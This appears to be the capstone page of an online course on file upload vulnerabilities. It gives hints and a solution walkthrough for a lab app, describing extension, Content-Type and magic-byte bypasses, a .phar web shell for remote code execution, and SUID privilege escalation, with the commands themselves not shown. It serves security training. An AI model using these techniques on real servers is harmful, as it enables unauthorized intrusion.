This capstone challenge brings together everything you have learned throughout this course. You will conduct a full-scope file upload assessment against a multi-layered target application. The challenge tests your ability to identify, exploit, and document file upload vulnerabilities in a realistic scenario that mirrors professional penetration testing engagements.
You have been engaged to perform a web application penetration test against a file-sharing platform called 'ShareVault.' The application allows users to upload and share files with other users. Your scope includes the entire application, and you have been provided with a standard user account.
The application has the following features: user registration and login, file upload with sharing, file preview, admin panel (which you should not have access to), and a public API. Your goal is to achieve remote code execution on the server through the file upload functionality.
Start the challenge environment:
If you get stuck, use these hints in order. Try to solve each step on your own before reading the next hint.
Hint 1: The application has three upload endpoints โ the main file upload, the avatar upload, and the API upload. Each has different validation. Start by testing each one with a simple PHP web shell and observe the different responses.
Hint 2: The main file upload checks both the file extension AND the Content-Type header. The avatar upload only checks the file extension. The API upload checks the file's magic bytes. You will need a different bypass technique for each.
Hint 3: For the avatar upload, try alternative extensions. For the main upload, try spoofing the Content-Type. For the API upload, try prepending valid image magic bytes to your PHP code. One of these will work.
Hint 4: Once you achieve RCE, the flag is at /root/flag.txt. You may need to check file permissions โ the web server runs as www-data, so you might need to find a way to read files owned by root. Check for SUID binaries or readable configuration files that might contain credentials.
Only read this section after attempting the challenge yourself. The solution demonstrates the complete methodology.
Step 1: Register an account and log in. Explore the application to find all upload endpoints: /upload.php (main), /profile/avatar.php (avatar), and /api/v1/upload (API).
Step 2: Test each endpoint with a basic PHP web shell (shell.php). Observe the responses:
Step 3: The avatar upload only checks the extension. Try alternative PHP extensions:
Step 4: Access the uploaded web shell and execute commands:
Step 5: Document the finding. The avatar upload endpoint had an incomplete whitelist that did not account for the .phar extension. PHP 8.1 on this server is configured to execute .phar files, allowing remote code execution.
Congratulations on completing the File Upload Vulnerabilities course! You have learned the complete lifecycle of file upload security โ from understanding how uploads work at the HTTP level, to identifying and exploiting vulnerabilities using multiple bypass techniques, to implementing comprehensive defenses and writing professional reports.
Here is a summary of the key skills you have mastered:
| Skill | Lesson(s) | Proficiency |
|---|---|---|
| Understanding file upload mechanics | 2 | โ Complete |
| Identifying attack vectors | 3 | โ Complete |
| Bypassing client-side validation | 4 | โ Complete |
| Bypassing server-side validation | 5 | โ Complete |
| Using Burp Suite for upload testing | 6 | โ Complete |
| Advanced bypass techniques | 7 | โ Complete |
| Framework-specific upload security | 8 | โ Complete |
| Implementing secure upload defenses | 9 | โ Complete |
| Hands-on exploitation methodology | 10 | โ Complete |
| Professional reporting and incident response | 11 | โ Complete |
| Full-scope assessment capability | 12 | โ Complete |
๐ก Continue practicing on platforms like HackTheBox, TryHackMe, and PortSwigger Web Academy. File upload vulnerabilities appear in virtually every web application โ the more you practice, the faster you will identify them during real engagements.
Remember: with great power comes great responsibility. The skills you have learned in this course are powerful โ use them ethically, always with proper authorization, and always to make the digital world more secure. Happy hunting!
Verify exercises to earn โ 250 XP and unlock next lab level.